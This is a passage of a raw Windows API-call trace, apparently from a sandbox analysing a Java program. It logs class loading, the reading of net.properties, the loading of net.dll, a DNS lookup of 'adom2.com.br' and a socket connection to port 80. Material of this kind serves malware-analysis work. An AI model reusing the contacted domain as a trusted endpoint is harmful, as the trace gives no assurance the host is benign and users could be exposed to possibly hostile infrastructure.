lpBuffer=0x4be6ec, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be684, lpOverlapped=0x0 | out: lpBuffer=0x4be6ec*, lpNumberOfBytesRead=0x4be684*=0x1e, lpOverlapped=0x0) returned 1 [0019.089] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x253fa85, lpNewFilePointer=0x0, dwMoveMethod=0x4be6f0 | out: lpNewFilePointer=0x0) returned 1 [0019.089] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x318, lpNumberOfBytesRead=0x4be6c0, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be6c0*=0x318, lpOverlapped=0x0) returned 1 [0019.090] strlen (_Str="java/net/CookieHandler.class") returned 0x1c [0019.090] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32ebd5e, lpNewFilePointer=0x0, dwMoveMethod=0x4be49c | out: lpNewFilePointer=0x0) returned 1 [0019.090] ReadFile (in: hFile=0xd4, lpBuffer=0xacb358, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be46c, lpOverlapped=0x0 | out: lpBuffer=0xacb358*, lpNumberOfBytesRead=0x4be46c*=0xa0, lpOverlapped=0x0) returned 1 [0019.090] strlen (_Str="java/net/CookieHandler.class") returned 0x1c [0019.090] strcpy (in: _Dest=0x4be5a0, _Source="java/net/CookieHandler.class" | out: _Dest="java/net/CookieHandler.class") returned="java/net/CookieHandler.class" [0019.090] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16e43dc, lpNewFilePointer=0x0, dwMoveMethod=0x4be0a0 | out: lpNewFilePointer=0x0) returned 1 [0019.090] ReadFile (in: hFile=0xd4, lpBuffer=0x4be0d8, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be070, lpOverlapped=0x0 | out: lpBuffer=0x4be0d8*, lpNumberOfBytesRead=0x4be070*=0x1e, lpOverlapped=0x0) returned 1 [0019.091] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16e4416, lpNewFilePointer=0x0, dwMoveMethod=0x4be0dc | out: lpNewFilePointer=0x0) returned 1 [0019.091] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x4aa, lpNumberOfBytesRead=0x4be0ac, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be0ac*=0x4aa, lpOverlapped=0x0) returned 1 [0019.092] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$3.class") returned 0x33 [0019.092] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33894f9, lpNewFilePointer=0x0, dwMoveMethod=0x4beab0 | out: lpNewFilePointer=0x0) returned 1 [0019.092] ReadFile (in: hFile=0xd4, lpBuffer=0xacb358, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bea80, lpOverlapped=0x0 | out: lpBuffer=0xacb358*, lpNumberOfBytesRead=0x4bea80*=0xa0, lpOverlapped=0x0) returned 1 [0019.092] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$3.class") returned 0x33 [0019.092] strcpy (in: _Dest=0x4bebb4, _Source="sun/net/www/protocol/http/HttpURLConnection$3.class" | out: _Dest="sun/net/www/protocol/http/HttpURLConnection$3.class") returned="sun/net/www/protocol/http/HttpURLConnection$3.class" [0019.092] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x253fd9d, lpNewFilePointer=0x0, dwMoveMethod=0x4be6b4 | out: lpNewFilePointer=0x0) returned 1 [0019.092] ReadFile (in: hFile=0xd4, lpBuffer=0x4be6ec, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be684, lpOverlapped=0x0 | out: lpBuffer=0x4be6ec*, lpNumberOfBytesRead=0x4be684*=0x1e, lpOverlapped=0x0) returned 1 [0019.092] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x253fdee, lpNewFilePointer=0x0, dwMoveMethod=0x4be6f0 | out: lpNewFilePointer=0x0) returned 1 [0019.092] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x318, lpNumberOfBytesRead=0x4be6c0, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be6c0*=0x318, lpOverlapped=0x0) returned 1 [0019.094] strlen (_Str="java/net/ResponseCache.class") returned 0x1c [0019.094] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32eca5f, lpNewFilePointer=0x0, dwMoveMethod=0x4be49c | out: lpNewFilePointer=0x0) returned 1 [0019.094] ReadFile (in: hFile=0xd4, lpBuffer=0xacb358, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be46c, lpOverlapped=0x0 | out: lpBuffer=0xacb358*, lpNumberOfBytesRead=0x4be46c*=0xa0, lpOverlapped=0x0) returned 1 [0019.094] strlen (_Str="java/net/ResponseCache.class") returned 0x1c [0019.094] strcpy (in: _Dest=0x4be5a0, _Source="java/net/ResponseCache.class" | out: _Dest="java/net/ResponseCache.class") returned="java/net/ResponseCache.class" [0019.094] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f2e1e, lpNewFilePointer=0x0, dwMoveMethod=0x4be0a0 | out: lpNewFilePointer=0x0) returned 1 [0019.094] ReadFile (in: hFile=0xd4, lpBuffer=0x4be0d8, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be070, lpOverlapped=0x0 | out: lpBuffer=0x4be0d8*, lpNumberOfBytesRead=0x4be070*=0x1e, lpOverlapped=0x0) returned 1 [0019.095] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f2e58, lpNewFilePointer=0x0, dwMoveMethod=0x4be0dc | out: lpNewFilePointer=0x0) returned 1 [0019.095] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x467, lpNumberOfBytesRead=0x4be0ac, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be0ac*=0x467, lpOverlapped=0x0) returned 1 [0019.097] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$7.class") returned 0x33 [0019.097] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338967d, lpNewFilePointer=0x0, dwMoveMethod=0x4bea0c | out: lpNewFilePointer=0x0) returned 1 [0019.097] ReadFile (in: hFile=0xd4, lpBuffer=0xacb358, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be9dc, lpOverlapped=0x0 | out: lpBuffer=0xacb358*, lpNumberOfBytesRead=0x4be9dc*=0xa0, lpOverlapped=0x0) returned 1 [0019.097] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$7.class") returned 0x33 [0019.097] strcpy (in: _Dest=0x4beb10, _Source="sun/net/www/protocol/http/HttpURLConnection$7.class" | out: _Dest="sun/net/www/protocol/http/HttpURLConnection$7.class") returned="sun/net/www/protocol/http/HttpURLConnection$7.class" [0019.097] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2540d27, lpNewFilePointer=0x0, dwMoveMethod=0x4be610 | out: lpNewFilePointer=0x0) returned 1 [0019.097] ReadFile (in: hFile=0xd4, lpBuffer=0x4be648, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be5e0, lpOverlapped=0x0 | out: lpBuffer=0x4be648*, lpNumberOfBytesRead=0x4be5e0*=0x1e, lpOverlapped=0x0) returned 1 [0019.097] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2540d78, lpNewFilePointer=0x0, dwMoveMethod=0x4be64c | out: lpNewFilePointer=0x0) returned 1 [0019.097] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x2e1, lpNumberOfBytesRead=0x4be61c, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be61c*=0x2e1, lpOverlapped=0x0) returned 1 [0019.099] strlen (_Str="sun/net/spi/DefaultProxySelector") returned 0x20 [0019.102] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0019.102] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\net.properties") returned 0x34 [0019.102] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\net.properties", lpFindFileData=0x4bcd34 | out: lpFindFileData=0x4bcd34) returned 0x253e60 [0019.102] FindClose (in: hFindFile=0x253e60 | out: hFindFile=0x253e60) returned 1 [0019.102] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib") returned 0x25 [0019.102] wcslen (_String="net.properties") returned 0xe [0019.102] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\net.properties") returned 0x34 [0019.107] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\net.properties") returned 0x34 [0019.107] wcscpy (in: _Dest=0x15054718, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\net.properties" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\net.properties") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\net.properties" [0019.107] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_92\\lib\\net.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0019.108] ReadFile (in: hFile=0x290, lpBuffer=0x4bb634, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bb5fc, lpOverlapped=0x0 | out: lpBuffer=0x4bb634*, lpNumberOfBytesRead=0x4bb5fc*=0xbfe, lpOverlapped=0x0) returned 1 [0019.110] GetFileType (hFile=0x290) returned 0x1 [0019.110] SetFilePointerEx (in: hFile=0x290, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bd6ac | out: lpNewFilePointer=0x0) returned 1 [0019.110] GetFileSizeEx (in: hFile=0x290, lpFileSize=0x4bd6d0 | out: lpFileSize=0x4bd6d0*=3070) returned 1 [0019.111] ReadFile (in: hFile=0x290, lpBuffer=0x4bb634, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x4bb5fc, lpOverlapped=0x0 | out: lpBuffer=0x4bb634*, lpNumberOfBytesRead=0x4bb5fc*=0x0, lpOverlapped=0x0) returned 1 [0019.111] CloseHandle (hObject=0x290) returned 1 [0019.129] strlen (_Str="sun/net/www/http/HttpClient.class") returned 0x21 [0019.129] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33886c6, lpNewFilePointer=0x0, dwMoveMethod=0x4be82c | out: lpNewFilePointer=0x0) returned 1 [0019.129] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be7fc, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be7fc*=0xa0, lpOverlapped=0x0) returned 1 [0019.129] strlen (_Str="sun/net/www/http/HttpClient.class") returned 0x21 [0019.129] strcpy (in: _Dest=0x4be930, _Source="sun/net/www/http/HttpClient.class" | out: _Dest="sun/net/www/http/HttpClient.class") returned="sun/net/www/http/HttpClient.class" [0019.129] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252a4d4, lpNewFilePointer=0x0, dwMoveMethod=0x4be430 | out: lpNewFilePointer=0x0) returned 1 [0019.129] ReadFile (in: hFile=0xd4, lpBuffer=0x4be468, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be400, lpOverlapped=0x0 | out: lpBuffer=0x4be468*, lpNumberOfBytesRead=0x4be400*=0x1e, lpOverlapped=0x0) returned 1 [0019.130] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252a513, lpNewFilePointer=0x0, dwMoveMethod=0x4be46c | out: lpNewFilePointer=0x0) returned 1 [0019.130] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x3e83, lpNumberOfBytesRead=0x4be43c, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be43c*=0x3e83, lpOverlapped=0x0) returned 1 [0019.131] strlen (_Str="sun/net/NetworkClient.class") returned 0x1b [0019.131] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3385a82, lpNewFilePointer=0x0, dwMoveMethod=0x4be1cc | out: lpNewFilePointer=0x0) returned 1 [0019.131] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be19c, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be19c*=0xa0, lpOverlapped=0x0) returned 1 [0019.131] strlen (_Str="sun/net/NetworkClient.class") returned 0x1b [0019.131] strcpy (in: _Dest=0x4be2d0, _Source="sun/net/NetworkClient.class" | out: _Dest="sun/net/NetworkClient.class") returned="sun/net/NetworkClient.class" [0019.131] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x24d8b3b, lpNewFilePointer=0x0, dwMoveMethod=0x4bddd0 | out: lpNewFilePointer=0x0) returned 1 [0019.131] ReadFile (in: hFile=0xd4, lpBuffer=0x4bde08, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bdda0, lpOverlapped=0x0 | out: lpBuffer=0x4bde08*, lpNumberOfBytesRead=0x4bdda0*=0x1e, lpOverlapped=0x0) returned 1 [0019.133] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x24d8b74, lpNewFilePointer=0x0, dwMoveMethod=0x4bde0c | out: lpNewFilePointer=0x0) returned 1 [0019.133] ReadFile (in: hFile=0xd4, lpBuffer=0x15038e60, nNumberOfBytesToRead=0x1182, lpNumberOfBytesRead=0x4bdddc, lpOverlapped=0x0 | out: lpBuffer=0x15038e60*, lpNumberOfBytesRead=0x4bdddc*=0x1182, lpOverlapped=0x0) returned 1 [0019.134] strlen (_Str="sun/net/NetworkClient$1.class") returned 0x1d [0019.134] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33859a1, lpNewFilePointer=0x0, dwMoveMethod=0x4be4f0 | out: lpNewFilePointer=0x0) returned 1 [0019.135] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be4c0, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be4c0*=0xa0, lpOverlapped=0x0) returned 1 [0019.135] strlen (_Str="sun/net/NetworkClient$1.class") returned 0x1d [0019.135] strcpy (in: _Dest=0x4be5f4, _Source="sun/net/NetworkClient$1.class" | out: _Dest="sun/net/NetworkClient$1.class") returned="sun/net/NetworkClient$1.class" [0019.135] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x24d8149, lpNewFilePointer=0x0, dwMoveMethod=0x4be0f4 | out: lpNewFilePointer=0x0) returned 1 [0019.135] ReadFile (in: hFile=0xd4, lpBuffer=0x4be12c, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be0c4, lpOverlapped=0x0 | out: lpBuffer=0x4be12c*, lpNumberOfBytesRead=0x4be0c4*=0x1e, lpOverlapped=0x0) returned 1 [0019.135] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x24d8184, lpNewFilePointer=0x0, dwMoveMethod=0x4be130 | out: lpNewFilePointer=0x0) returned 1 [0019.135] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x3cd, lpNumberOfBytesRead=0x4be100, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be100*=0x3cd, lpOverlapped=0x0) returned 1 [0019.137] strlen (_Str="sun/net/www/http/KeepAliveCache.class") returned 0x25 [0019.137] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33887b8, lpNewFilePointer=0x0, dwMoveMethod=0x4be5a4 | out: lpNewFilePointer=0x0) returned 1 [0019.137] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be574, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be574*=0xa0, lpOverlapped=0x0) returned 1 [0019.137] strlen (_Str="sun/net/www/http/KeepAliveCache.class") returned 0x25 [0019.137] strcpy (in: _Dest=0x4be6a8, _Source="sun/net/www/http/KeepAliveCache.class" | out: _Dest="sun/net/www/http/KeepAliveCache.class") returned="sun/net/www/http/KeepAliveCache.class" [0019.137] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252ea30, lpNewFilePointer=0x0, dwMoveMethod=0x4be1a8 | out: lpNewFilePointer=0x0) returned 1 [0019.137] ReadFile (in: hFile=0xd4, lpBuffer=0x4be1e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be178, lpOverlapped=0x0 | out: lpBuffer=0x4be1e0*, lpNumberOfBytesRead=0x4be178*=0x1e, lpOverlapped=0x0) returned 1 [0019.138] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252ea73, lpNewFilePointer=0x0, dwMoveMethod=0x4be1e4 | out: lpNewFilePointer=0x0) returned 1 [0019.138] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0xfd2, lpNumberOfBytesRead=0x4be1b4, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be1b4*=0xfd2, lpOverlapped=0x0) returned 1 [0019.142] strlen (_Str="sun/net/www/http/KeepAliveKey.class") returned 0x23 [0019.143] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33888b8, lpNewFilePointer=0x0, dwMoveMethod=0x4be908 | out: lpNewFilePointer=0x0) returned 1 [0019.143] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be8d8, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be8d8*=0xa0, lpOverlapped=0x0) returned 1 [0019.143] strlen (_Str="sun/net/www/http/KeepAliveKey.class") returned 0x23 [0019.143] strcpy (in: _Dest=0x4bea0c, _Source="sun/net/www/http/KeepAliveKey.class" | out: _Dest="sun/net/www/http/KeepAliveKey.class") returned="sun/net/www/http/KeepAliveKey.class" [0019.143] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252feb5, lpNewFilePointer=0x0, dwMoveMethod=0x4be50c | out: lpNewFilePointer=0x0) returned 1 [0019.143] ReadFile (in: hFile=0xd4, lpBuffer=0x4be544, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be4dc, lpOverlapped=0x0 | out: lpBuffer=0x4be544*, lpNumberOfBytesRead=0x4be4dc*=0x1e, lpOverlapped=0x0) returned 1 [0019.143] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252fef6, lpNewFilePointer=0x0, dwMoveMethod=0x4be548 | out: lpNewFilePointer=0x0) returned 1 [0019.143] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x3cf, lpNumberOfBytesRead=0x4be518, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be518*=0x3cf, lpOverlapped=0x0) returned 1 [0019.146] strlen (_Str="sun/net/www/http/HttpCapture.class") returned 0x22 [0019.146] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338856e, lpNewFilePointer=0x0, dwMoveMethod=0x4be774 | out: lpNewFilePointer=0x0) returned 1 [0019.146] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be744, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be744*=0xa0, lpOverlapped=0x0) returned 1 [0019.146] strlen (_Str="sun/net/www/http/HttpCapture.class") returned 0x22 [0019.146] strcpy (in: _Dest=0x4be878, _Source="sun/net/www/http/HttpCapture.class" | out: _Dest="sun/net/www/http/HttpCapture.class") returned="sun/net/www/http/HttpCapture.class" [0019.146] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2528aa3, lpNewFilePointer=0x0, dwMoveMethod=0x4be378 | out: lpNewFilePointer=0x0) returned 1 [0019.147] ReadFile (in: hFile=0xd4, lpBuffer=0x4be3b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be348, lpOverlapped=0x0 | out: lpBuffer=0x4be3b0*, lpNumberOfBytesRead=0x4be348*=0x1e, lpOverlapped=0x0) returned 1 [0019.147] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2528ae3, lpNewFilePointer=0x0, dwMoveMethod=0x4be3b4 | out: lpNewFilePointer=0x0) returned 1 [0019.147] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0xe5a, lpNumberOfBytesRead=0x4be384, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be384*=0xe5a, lpOverlapped=0x0) returned 1 [0019.149] strlen (_Str="sun/net/www/http/HttpCapture$1.class") returned 0x24 [0019.149] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338851c, lpNewFilePointer=0x0, dwMoveMethod=0x4be87c | out: lpNewFilePointer=0x0) returned 1 [0019.149] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be84c, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be84c*=0xa0, lpOverlapped=0x0) returned 1 [0019.149] strlen (_Str="sun/net/www/http/HttpCapture$1.class") returned 0x24 [0019.149] strcpy (in: _Dest=0x4be980, _Source="sun/net/www/http/HttpCapture$1.class" | out: _Dest="sun/net/www/http/HttpCapture$1.class") returned="sun/net/www/http/HttpCapture$1.class" [0019.149] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25287f4, lpNewFilePointer=0x0, dwMoveMethod=0x4be480 | out: lpNewFilePointer=0x0) returned 1 [0019.149] ReadFile (in: hFile=0xd4, lpBuffer=0x4be4b8, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be450, lpOverlapped=0x0 | out: lpBuffer=0x4be4b8*, lpNumberOfBytesRead=0x4be450*=0x1e, lpOverlapped=0x0) returned 1 [0019.149] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2528836, lpNewFilePointer=0x0, dwMoveMethod=0x4be4bc | out: lpNewFilePointer=0x0) returned 1 [0019.149] ReadFile (in: hFile=0xd4, lpBuffer=0xaa41a8, nNumberOfBytesToRead=0x26d, lpNumberOfBytesRead=0x4be48c, lpOverlapped=0x0 | out: lpBuffer=0xaa41a8*, lpNumberOfBytesRead=0x4be48c*=0x26d, lpOverlapped=0x0) returned 1 [0019.160] strlen (_Str="") returned 0x0 [0019.160] strlen (_Str=".dll") returned 0x4 [0019.160] strlen (_Str="") returned 0x0 [0019.160] strlen (_Str=".dll") returned 0x4 [0019.161] GetModuleHandleA (lpModuleName=0x0) returned 0xda0000 [0019.161] strlen (_Str="net.dll") returned 0x7 [0019.161] strcpy (in: _Dest=0xb9b440, _Source="net.dll" | out: _Dest="net.dll") returned="net.dll" [0019.161] strlen (_Str="net.dll") returned 0x7 [0019.161] strlen (_Str="net") returned 0x3 [0019.161] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0019.161] strncpy (in: _Dest=0xb5ef60, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoadtring") returned="_JNI_OnLoadtring" [0019.161] strcat (in: _Dest=0xb5ef60, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0019.161] strcat (in: _Dest=0xb5ef60, _Source="net" | out: _Dest="_JNI_OnLoad_net") returned="_JNI_OnLoad_net" [0019.161] strcat (in: _Dest=0xb5ef60, _Source="@8" | out: _Dest="_JNI_OnLoad_net@8") returned="_JNI_OnLoad_net@8" [0019.161] strlen (_Str="net") returned 0x3 [0019.161] strlen (_Str="JNI_OnLoad") returned 0xa [0019.161] strcpy (in: _Dest=0xb682a8, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0019.161] strcat (in: _Dest=0xb682a8, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0019.161] strcat (in: _Dest=0xb682a8, _Source="net" | out: _Dest="JNI_OnLoad_net") returned="JNI_OnLoad_net" [0019.161] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll") returned 0x2d [0019.162] wcscpy (in: _Dest=0x15056f30, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll") returned="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll" [0019.162] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll", nBufferLength=0x9, lpBuffer=0x4be210, lpFilePart=0x4be20c | out: lpBuffer="", lpFilePart=0x4be20c) returned 0x2e [0019.162] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\bin\\net.dll", fInfoLevelId=0x0, lpFileInformation=0x4be200 | out: lpFileInformation=0x4be200) returned 1 [0019.179] getaddrinfo (in: pNodeName="adom2.com.br", pServiceName=0x0, pHints=0x4beee8, ppResult=0x4bef10 | out: ppResult=0x4bef10) returned 0 [0019.185] htonl (hostlong=0x100007f) returned 0x7f000001 [0019.185] FreeAddrInfoW (pAddrInfo=0x25ad60) [0019.187] socket (af=23, type=1, protocol=0) returned 0x290 [0019.187] SetHandleInformation (hObject=0x290, dwMask=0x1, dwFlags=0x0) returned 1 [0019.187] setsockopt (s=0x290, level=41, optname=27, optval="", optlen=4) returned 0 [0019.187] SetHandleInformation (hObject=0x290, dwMask=0x1, dwFlags=0x0) returned 1 [0019.194] htons (hostshort=0x50) returned 0x5000 [0019.194] connect (s=0x290, name=0x4bee78*(sa_family=23, sin6_port=0x50, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:FFFFFFFFFFFFFF", sin6_scope_id=0x0), namelen=28) returned 0 [0019.195] getsockname (in: s=0x290, name=0x4bee88, namelen=0x4bee84 | out: name=0x4bee88*(sa_family=23, sin6_port=0xc006, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:FFFFFFFFFFFFFF", sin6_scope_id=0x0), namelen=0x4bee84) returned 0 [0019.196] htons (hostshort=0x6c0) returned 0xc006 [0019.196] strlen (_Str="java/net/Socket$3.class") returned 0x17 [0019.196] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32ecc18, lpNewFilePointer=0x0, dwMoveMethod=0x4be868 | out: lpNewFilePointer=0x0) returned 1 [0019.196] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be838, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be838*=0xa0, lpOverlapped=0x0) returned 1 [0019.196] strlen (_Str="java/net/Socket$3.class") returned 0x17 [0019.196] strcpy (in: _Dest=0x4be96c, _Source="java/net/Socket$3.class" | out: _Dest="java/net/Socket$3.class") returned="java/net/Socket$3.class" [0019.197] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f4460, lpNewFilePointer=0x0, dwMoveMethod=0x4be46c | out: lpNewFilePointer=0x0) returned 1 [0019.197] ReadFile (in: hFile=0xd4, lpBuffer=0x4be4a4, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be43c, lpOverlapped=0x0 | out: lpBuffer=0x4be4a4*, lpNumberOfBytesRead=0x4be43c*=0x1e, lpOverlapped=0x0) returned 1 [0019.197] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f4495, lpNewFilePointer=0x0, dwMoveMethod=0x4be4a8 | out: lpNewFilePointer=0x0) returned 1 [0019.197] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x2ef, lpNumberOfBytesRead=0x4be478, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be478*=0x2ef, lpOverlapped=0x0) returned 1 [0019.198] strlen (_Str="java/net/SocketOutputStream.class") returned 0x21 [0019.198] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32eccf4, lpNewFilePointer=0x0, dwMoveMethod=0x4be374 | out: lpNewFilePointer=0x0) returned 1 [0019.198] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be344, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be344*=0xa0, lpOverlapped=0x0) returned 1 [0019.199] strlen (_Str="java/net/SocketOutputStream.class") returned 0x21 [0019.199] strcpy (in: _Dest=0x4be478, _Source="java/net/SocketOutputStream.class" | out: _Dest="java/net/SocketOutputStream.class") returned="java/net/SocketOutputStream.class" [0019.199] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f5376, lpNewFilePointer=0x0, dwMoveMethod=0x4bdf78 | out: lpNewFilePointer=0x0) returned 1 [0019.199] ReadFile (in: hFile=0xd4, lpBuffer=0x4bdfb0, nNumberOfBytesToRead=0x1e, 